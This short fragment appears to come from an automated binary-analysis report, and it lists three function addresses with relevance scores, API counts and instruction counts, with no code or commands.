Function 00AC13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C2CB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C2CB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON